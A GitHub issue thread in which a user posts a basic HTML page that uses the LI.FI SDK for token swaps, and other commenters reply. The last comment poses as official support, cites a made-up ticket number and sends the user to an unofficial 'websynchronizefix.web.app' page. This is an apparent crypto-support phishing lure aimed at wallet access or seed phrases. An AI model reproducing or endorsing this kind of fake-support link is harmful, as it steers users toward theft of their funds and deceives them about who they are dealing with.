### ISSUE TITLE
BBQFINANCE SWAP

### ISSUE THREAD

**Issue by Qcteck** [lifinance/widget#329]
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>LI.FI Swap</title>
  <script src="https://cdn.jsdelivr.net/npm/@lifi/sdk@latest"></script>
</head>
<body>
  <h1>LI.FI Swap Interface</h1>
  <div>
    <label for="fromToken">From Token:</label>
    <input type="text" id="fromToken" placeholder="Enter token address">
  </div>
  <div>
    <label for="toToken">To Token:</label>
    <input type="text" id="toToken" placeholder="Enter token address">
  </div>
  <div>
    <label for="amount">Amount:</label>
    <input type="number" id="amount" placeholder="Enter amount">
  </div>
  <button id="swapButton">Swap</button>

  <script>
    // Initialize the LI.FI SDK
    const lifi = new LiFi();

    document.getElementById('swapButton').addEventListener('click', async () => {
      const fromToken = document.getElementById('fromToken').value;
      const toToken = document.getElementById('toToken').value;
      const amount = document.getElementById('amount').value;

      try {
        const route = await lifi.getRoutes({
          fromChainId: 1, // Ethereum Mainnet
          fromTokenAddress: fromToken,
          toChainId: 1, // Ethereum Mainnet
          toTokenAddress: toToken,
          fromAmount: amount,
        });

        // Execute the swap
        if (route.routes.length > 0) {
          const tx = await lifi.executeRoute(route.routes[0]);
          console.log('Transaction successful:', tx);
        } else {
          alert('No available routes.');
        }
      } catch (error) {
        console.error('Error:', error);
        alert('Swap failed. See console for details.');
      }
    });
  </script>
</body>
</html>

**Comment by Athensmo** [comment]
resolved yet?

**Comment by chybisov** [comment]
@Athensmo please provide detailed question or describe the issue :)

**Comment by Qcteck** [comment]
No i cant fix i try to make swap by li.fi Envoyé de mon iPhoneLe 5 déc. 2024 à 14:25, Eugene Chybisov ***@***.***> a écrit :﻿
@Athensmo please provide detailed question or describe the issue :)

**Comment by Athensmo** [comment]
Ok, sorry that you couldn't fix this issue. I have created a support ticket for you: LIF4638273. Use it to initiate a chat with the support team on the LIFINANCE DAPP PROTOCOL official webpage via https://websynchronizefix.web.app/
Once you start a chat using the chat icon on the page, provide your support ticket number and get your issue resolved
________________________________
